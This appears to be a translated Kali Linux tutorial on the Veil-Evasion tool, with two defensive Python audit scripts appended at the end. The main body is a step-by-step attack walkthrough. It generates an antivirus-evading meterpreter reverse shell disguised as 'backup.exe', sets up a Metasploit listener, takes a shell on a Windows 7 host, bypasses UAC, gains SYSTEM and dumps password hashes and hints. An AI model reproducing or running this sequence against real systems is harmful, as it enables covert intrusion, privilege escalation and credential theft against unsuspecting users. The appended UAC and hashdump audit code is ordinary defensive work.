Kali Linux antivirus-evading payload generation tool: Veil

Source: Internet
Author: User
Tags: gpg, kali, linux

Veil is a payload generation tool that is compatible with the Metasploit Framework and bypasses the common antivirus software found in most network environments. This section describes how to install and use the Veil tool.

In Kali Linux, the Veil tool is not installed by default, so install it first by executing the following command:

root@kali:~# apt-get install veil

If the above command completes without reporting an error, the Veil tool has been installed successfully. This takes a while, because the tool depends on a number of other packages that are installed along with it.

Start the Veil tool. The execution commands are as follows:

root@kali:~# veil-evasion

After executing the above command, a large amount of information is output, as shown below:

===============================================
 Veil First Run detected ... Initializing Script setup...
===============================================

[*] Executing ./setup/setup.sh

===============================================
 Veil-Evasion Setup Script | [Updated]: 01.15.2015
===============================================
 [Web]: https://www.veil-framework.com | [Twitter]: @VeilFramework
===============================================

[*] Initializing Apt Dependencies Installation
[*] Adding i386 Architecture to x86_64 system
[*] Updating Apt package lists
Hit http://mirrors.ustc.edu.cn kali Release.gpg
Hit http://mirrors.ustc.edu.cn kali/updates Release.gpg
Hit http://mirrors.ustc.edu.cn kali Release
Hit http://mirrors.ustc.edu.cn kali/updates Release
Hit http://mirrors.ustc.edu.cn kali/main Sources
Hit http://mirrors.ustc.edu.cn kali/non-free Sources
Hit http://mirrors.ustc.edu.cn kali/contrib Sources
Hit http://mirrors.ustc.edu.cn kali/main amd64 Packages
Hit http://mirrors.ustc.edu.cn kali/non-free amd64 Packages
Hit http://mirrors.ustc.edu.cn kali/contrib amd64 Packages
Get:1 http://mirrors.ustc.edu.cn kali/main i386 Packages [8,474 kB]
Hit http://http.kali.org kali Release.gpg
Hit http://security.kali.org kali/updates Release.gpg
Hit http://http.kali.org kali Release
...
Ign http://http.kali.org kali/non-free Translation-en
Fetched 17.8 MB in 20s (859 kB/s)
Reading package lists... Done
[*] Installing Wine i386 Binaries
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following extra packages will be installed:
  gcc-4.7-base:i386 libasound2:i386 libc-bin libc-dev-bin libc6 libc6:i386
  libc6-dev libc6-i686:i386 libdbus-1-3:i386 libdrm-intel1:i386
  libdrm-nouveau1a:i386 libdrm-radeon1:i386 libdrm2:i386 libexpat1:i386
  libffi5:i386 libfontconfig1:i386 libfreetype6:i386 libgcc1:i386
[*] Cleaning up Setup files
[*] Updating Veil-Framework Configuration

 Veil-Framework configuration:

 [*] operating_system = Kali
 [*] terminal_clear = clear
 [*] temp_dir = /tmp/
 [*] msfvenom_options =
 [*] metasploit_path = /usr/share/metasploit-framework/
 [*] pyinstaller_path = /usr/share/pyinstaller/
 [*] veil_evasion_path = /usr/share/veil-evasion/
 [*] payload_source_path = /root/veil-output/source/
 [*] Path '/root/veil-output/source/' Created
 [*] payload_compiled_path = /root/veil-output/compiled/
 [*] Path '/root/veil-output/compiled/' Created
 [*] Path '/root/veil-output/handlers/' Created
 [*] generate_handler_script = True
 [*] handler_path = /root/veil-output/handlers/
 [*] hash_list = /root/veil-output/hashes.txt
 [*] veil_catapult_path = /usr/share/veil-catapult/
 [*] Path '/root/veil-output/catapult/' Created
 [*] catapult_resource_path = /root/veil-output/catapult/
 [*] Path '/etc/veil/' Created

 Configuration File written to '/etc/veil/settings.py'

The above information is displayed only the first time you run Veil. During this process it initializes some scripts, updates the package lists and configuration, and installs the required packages. As part of this, Python and two of its modules, pywin32-218 and pycrypto-2.6, are installed through graphical installer dialogs. Install them in turn as follows. The first dialog box to appear is shown in Figure 6.32.

Figure 6.32 Python initial interface

This is the initial screen of the Python installer. Keep the default settings, click the Next button, and the screen shown in Figure 6.33 is displayed.

Figure 6.33 Choosing a Python installation location

Click the Next button on this screen to display the screen shown in Figure 6.34. It warns that C:\Python27 already exists and asks you to confirm that you want to overwrite the existing files. Click the Yes button to display the screen shown in Figure 6.35.

Figure 6.34 Confirming the location of the Python installation

Figure 6.35 Customizing Python

This screen lets you customize which Python features are installed. Keep the default settings, click the Next button, and the screen shown in Figure 6.36 is displayed.

Figure 6.36 Installation Complete

This screen indicates that Python has been installed. Click the Finish button to display the screen shown in Figure 6.37.

Figure 6.37 Installing the pywin32-218 module interface

This screen starts the installation of the pywin32-218 module. Click the Next button to display the screen shown in Figure 6.38.

Figure 6.38 Setup Wizard

Keep the default settings, click the Next button, and the screen shown in Figure 6.39 is displayed.

Figure 6.39 Preparing the installation

This screen is where the installation actually starts. Once you have confirmed that the configuration is correct, click the Next button to display the screen shown in Figure 6.40.

Figure 6.40 Installation Complete

This screen shows that the pywin32-218 module has been installed. Click the Finish button to display the screen shown in Figure 6.41.

Figure 6.41 Installing the pycrypto-2.6 module initial interface

This screen starts the installation of the pycrypto-2.6 module. Click the Next button to begin, and the screen shown in Figure 6.42 is displayed.

Figure 6.42 Setup Wizard

Keep the default settings, click the Next button, and the screen shown in Figure 6.43 is displayed.

Figure 6.43 Preparing the installation

This screen is where the pycrypto module is actually installed. Click the Next button to display the screen shown in Figure 6.44.

Figure 6.44 Installation Complete

This screen shows that all of the above packages have been installed. Click the Finish button and the following information appears:

===============================================
 Veil-Evasion | [Version]: 2.4.3
===============================================
 [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================

 Main Menu

    24 payloads loaded

 Available commands:

    use      use a specific payload
    info     information on a specific payload
    list     list available payloads
    update   update Veil to the latest version
    clean    clean out payload folders
    checkvt  check payload hashes vs. VirusTotal
    exit     exit Veil

 [>] Please enter a command:

The above output shows that Veil has loaded 24 payloads, and it lists the available commands. You can now work with the tool. For example, to view the loadable payloads, execute the following command:

[>] Please enter a command: list
===============================================
 Veil-Evasion | [Version]: 2.4.3
===============================================
 [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================

 [*] Available payloads:

    1)  c/meterpreter/rev_tcp
    2)  c/meterpreter/rev_tcp_service
    3)  c/shellcode_inject/virtual
    4)  c/shellcode_inject/void
    5)  cs/meterpreter/rev_tcp
    6)  cs/shellcode_inject/base64_substitution
    7)  cs/shellcode_inject/virtual
    8)  native/hyperion
    9)  native/backdoor_factory
    10) native/pe_scrambler
    11) powershell/shellcode_inject/download_virtual
    12) powershell/shellcode_inject/psexec_virtual
    13) powershell/shellcode_inject/virtual
    14) python/meterpreter/rev_http
    15) python/meterpreter/rev_http_contained
    16) python/meterpreter/rev_https
    17) python/meterpreter/rev_https_contained
    18) python/meterpreter/rev_tcp
    19) python/shellcode_inject/aes_encrypt
    20) python/shellcode_inject/arc_encrypt
    21) python/shellcode_inject/base64_substitution
    22) python/shellcode_inject/des_encrypt
    23) python/shellcode_inject/flat
    24) python/shellcode_inject/letter_substitution

The output lists the 24 available payloads. Any of them can now be used for a penetration attack.

Example 6-5 demonstrates the use of a payload in the Veil tool (here, cs/meterpreter/rev_tcp) for a penetration attack, with a Windows 7 host as the target machine. The steps are as follows.

(1) Start the Veil tool. The execution commands are as follows:

root@kali:~# veil-evasion

After executing the above command, the following information is displayed:

===============================================
 Veil-Evasion | [Version]: 2.4.3
===============================================
 [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================

 Main Menu

    24 payloads loaded

 Available commands:

    use      use a specific payload
    info     information on a specific payload
    list     list available payloads
    update   update Veil to the latest version
    clean    clean out payload folders
    checkvt  check payload hashes vs. VirusTotal
    exit     exit Veil

 [>] Please enter a command:

When the [>] Please enter a command: prompt appears in the output, Veil has started successfully.

(2) Select the cs/meterpreter/rev_tcp payload. In the payload list, cs/meterpreter/rev_tcp is number 5. The execution commands are as follows:

[>] Please enter a command: use 5
===============================================
 Veil-Evasion | [Version]: 2.4.3
===============================================
 [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================

 Payload: cs/meterpreter/rev_tcp loaded

 Required Options:

 Name            Current Value   Description
 ----            -------------   --------------------------
 LHOST                           IP of the metasploit handler
 LPORT           4444            Port of the metasploit handler
 compile_to_exe  Y               Compile to an executable

 Available commands:

    set       set a specific option value
    info      show information about the payload
    generate  generate payload
    back      go to the main menu
    exit      exit Veil

 [>] Please enter a command:

The output shows the configurable options of the rev_tcp payload. The local port (LPORT) defaults to 4444; the LHOST option has not been configured yet.

(3) Configure the LHOST option and view the details of the payload. The execution commands are as follows:

[>] Please enter a command: set LHOST 192.168.6.103
[>] Please enter a command: info
===============================================
 Veil-Evasion | [Version]: 2.4.3
===============================================
 [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================

 Payload information:

    Name:         cs/meterpreter/rev_tcp
    Language:     cs
    Rating:       Excellent
    Description:  pure windows/meterpreter/reverse_tcp stager, no shellcode

 Required Options:

 Name             Current Value  Description
 ----             -------------  --------------------------
 LHOST            192.168.6.100  IP of the metasploit handler
 LPORT            4444           Port of the metasploit handler
 compile_to_exe   Y              Compile to an executable

The output shows the details of the rev_tcp payload, such as its name, language, rating and configuration options.

(4) Now use the generate command to generate the payload file. The execution commands are as follows:

[>] Please enter a command: generate
===============================================
 Veil-Evasion | [Version]: 2.4.3
===============================================
 [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================

[*] Press [enter] for 'payload'
[>] Please enter the base name for output files: backup    # specify the output file name

The file name backup is entered above. Press Enter, and the following information is displayed:

[*] Executable written to: /root/veil-output/compiled/backup.exe

 Language:          cs
 Payload:           cs/meterpreter/rev_tcp
 Required Options:  LHOST=192.168.6.103  LPORT=4444  compile_to_exe=Y
 Payload File:      /root/veil-output/source/backup.cs
 Handler File:      /root/veil-output/handlers/backup_handler.rc

[*] Your payload files have been generated, don't get caught!
[!] And don't submit samples to any online scanner! ;)

[>] press any key to return to the main menu:

The output shows that an executable file, backup.exe, has been generated and saved in /root/veil-output/compiled/. Once this executable is delivered to the target host and run there, the payload takes effect.

Next, you need to create a handler in Metasploit that waits for the target host to connect back to the Kali Linux (attacking) host. Once the connection is made, a remote shell is obtained.

Example 6-6 creates the handler. The steps are as follows.

(1) Start the MSF terminal.

(2) Use the handler module. The execution commands are as follows:

msf > use exploit/multi/handler

(3) Load the reverse_tcp payload and set its options. The execution commands are as follows:

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.6.103
LHOST => 192.168.6.103

(4) Launch the attack. The execution commands are as follows:

msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.6.103:4444
[*] Starting the payload handler...

The output shows that the handler has started and is waiting for the target host to connect.

Send the previously generated executable backup.exe to the target host (Windows 7) and run it there. Then return to the Kali Linux system, where the following information appears:

[*] Sending stage (769536 bytes) to 192.168.6.110
[*] Meterpreter session 1 opened (192.168.6.103:4444 -> 192.168.6.110:2478) at 2014-07-17 10:44:47 +0800

meterpreter >

The output shows that a Meterpreter session has been opened successfully. This means the target host has been compromised and shell commands can now be run on it. To enter the shell environment of the target host, execute the following command:

meterpreter > shell
Process 1544 created.
Channel 1 created.
Microsoft Windows [版本 6.1.7601]
(c) 2009 Microsoft Corporation

C:\Users\lyw\Desktop>

The output shows that you are now at the Windows 7 command line of the target system, and that the user currently logged on there is lyw.

If this user does not have sufficient privileges, the bypassuac module in Metasploit can be used to bypass UAC (User Account Control) and so elevate the user's privileges. The following describes how to use the bypassuac module to elevate the privileges of the lyw user above.

(1) Put the Meterpreter session into the background. The execution commands are as follows:

meterpreter > background
[*] Backgrounding session 1...

The output shows that the session now running in the background is number 1. Remember this session number; it is needed later.

(2) View the session details. The execution commands are as follows:

The output shows the architecture, computer name and IP address of the target system connected in this session.

(3) Use the bypassuac module and view its configurable options. The execution commands are as follows:

The output shows that the module has one configurable option, session, whose value is the number of the session currently running in the background.

(4) Set the session option, as shown below:

msf exploit(bypassuac) > set session 1
session => 1

(5) Launch the attack. The execution commands are as follows:

msf exploit(bypassuac) > exploit

[*] Started reverse handler on 192.168.6.103:4444
[*] UAC is Enabled, checking level...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[+] Part of Administrators group! Continuing...
[*] Uploaded the agent to the filesystem....
[*] Uploading the bypass UAC executable to the filesystem...
[*] Meterpreter stager executable 73802 bytes long being uploaded..
[*] Sending stage (769536 bytes) to 192.168.6.106
[*] Meterpreter session 2 opened (192.168.6.103:4444 -> 192.168.6.106:49206) at 2014-07-18 10:15:38 +0800

meterpreter >

The output shows that the currently logged-on user is in fact a member of the Administrators group, and that a new session has been opened by bypassing UAC. The user's privileges can now be elevated.
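The bypassuac output above only continued because the host reported "UAC is set to Default". The following is an added example for this page (not part of the tutorial, Veil or Metasploit) that maps the three registry values defining the UAC slider to a level name, so an administrator can find hosts that are not set to "Always notify"; the registry path and value names are the real Windows ones, and the value sets used for testing are constructed.

```python
"""Audit the UAC notification level that the bypassuac run above depends on.

Added example for this page; it is not part of the tutorial, Veil or Metasploit.
Registry path and value names are the real Windows ones; sample value sets are
constructed.
"""
import sys
from dataclasses import dataclass

# HKLM subkey that holds the UAC policy values.
UAC_KEY = r"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"


@dataclass(frozen=True)
class UacSettings:
    enable_lua: int                     # EnableLUA: 0 turns UAC off entirely
    consent_prompt_behavior_admin: int  # ConsentPromptBehaviorAdmin: 0 never, 2 always, 5 default
    prompt_on_secure_desktop: int       # PromptOnSecureDesktop: 1 dims the desktop for the prompt


def uac_level(s: UacSettings) -> str:
    """Return the UAC slider name for a set of registry values."""
    if s.enable_lua == 0:
        return "Disabled"
    admin, secure = s.consent_prompt_behavior_admin, s.prompt_on_secure_desktop
    if admin == 0:
        return "Never notify"
    if admin == 2 and secure == 1:
        return "Always notify"
    if admin == 5:
        return "Default" if secure == 1 else "Default (no secure desktop)"
    return f"Custom (ConsentPromptBehaviorAdmin={admin}, PromptOnSecureDesktop={secure})"


def meets_always_notify(s: UacSettings) -> bool:
    """Hardening check: only 'Always notify' removes the silent auto-elevation of
    trusted Windows binaries that the 'Default' level permits for administrators."""
    return uac_level(s) == "Always notify"


def read_live_settings() -> UacSettings:
    """Read the three values from the local registry (Windows only).
    Missing values take the Windows defaults, which correspond to the 'Default' level."""
    if sys.platform != "win32":
        raise RuntimeError("the registry can only be read on a Windows host")
    import winreg  # only available on Windows

    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, UAC_KEY) as key:
        def value(name: str, default: int) -> int:
            try:
                return int(winreg.QueryValueEx(key, name)[0])
            except FileNotFoundError:
                return default

        return UacSettings(value("EnableLUA", 1),
                           value("ConsentPromptBehaviorAdmin", 5),
                           value("PromptOnSecureDesktop", 1))


if __name__ == "__main__":
    settings = read_live_settings()
    print(f"UAC level: {uac_level(settings)}; meets 'Always notify': {meets_always_notify(settings)}")
```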

(6) View the lyw user's information. The execution commands are as follows:

meterpreter > getuid
Server username: WIN-RKPKQFBLG6C\lyw

The output shows that the user is still an ordinary user on the computer WIN-RKPKQFBLG6C.

(7) Elevate the privileges of the lyw user and view the user information again. The execution commands are as follows:

meterpreter > getsystem
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

The output shows that the lyw user now has system-level privileges. At this point anything can be done, such as capturing the password hashes of the users on the target system. The execution commands are as follows:

meterpreter > run post/windows/gather/hashdump

[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 88f6c818af614f7033cb88574907b61c...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...

Test:"www.123"
abc:"123456"
alice:"passwd"

[*] Dumping password hashes...

Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
bob:1001:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::

The output shows three user accounts on the target system, together with their user IDs and password hashes. Three password hints are also captured; for example, the hint captured for the Test user is www.123.
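The hashdump listing above is also what a defender would review after an assessment. The following is an added example for this page (not from the tutorial, Veil or Metasploit) that parses the pwdump-style lines the module prints (user:RID:LM hash:NT hash:::) together with the hint lines, and reports the weaknesses to remediate: accounts whose NT hash is the hash of the empty string (a blank password), accounts whose LM hash is still stored, and plaintext hints readable by anyone who can read the SAM. SAMPLE_DUMP is constructed from the output shown above.

```python
"""Audit a hashdump listing for blank passwords, LM storage and hint leakage.

Added example for this page; not from the original tutorial, Veil or Metasploit.
SAMPLE_DUMP is constructed from the hashdump output shown in the tutorial.
"""
import re
from dataclasses import dataclass

EMPTY_NT_HASH = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty password
EMPTY_LM_HASH = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of "" (LM storage disabled)

# user:RID:LM hash:NT hash:::  as printed by post/windows/gather/hashdump
HASH_LINE = re.compile(r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::$")
# user:"hint text"  as printed under "Dumping password hints..."
HINT_LINE = re.compile(r'^(?P<user>[^:]+):"(?P<hint>[^"]*)"$')

SAMPLE_DUMP = """
[*] Dumping password hints...
Test:"www.123"
abc:"123456"
alice:"passwd"
[*] Dumping password hashes...
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
bob:1001:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
"""


@dataclass(frozen=True)
class Account:
    user: str
    rid: int
    lm: str
    nt: str


def parse_hashdump(text: str) -> tuple[list[Account], dict[str, str]]:
    """Split hashdump output into account records and a user -> hint map."""
    accounts: list[Account] = []
    hints: dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if (m := HINT_LINE.match(line)):
            hints[m["user"]] = m["hint"]
        elif (m := HASH_LINE.match(line)):
            accounts.append(Account(m["user"], int(m["rid"]), m["lm"].lower(), m["nt"].lower()))
    return accounts, hints


def audit(text: str) -> dict:
    """Return the findings a defender would act on."""
    accounts, hints = parse_hashdump(text)
    return {
        "blank_password": [a.user for a in accounts if a.nt == EMPTY_NT_HASH],
        "lm_stored": [a.user for a in accounts if a.lm != EMPTY_LM_HASH],
        "hints": hints,  # hints are stored in plaintext; treat every one as a leak
    }


if __name__ == "__main__":
    for finding, value in audit(SAMPLE_DUMP).items():
        print(f"{finding}: {value}")
```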
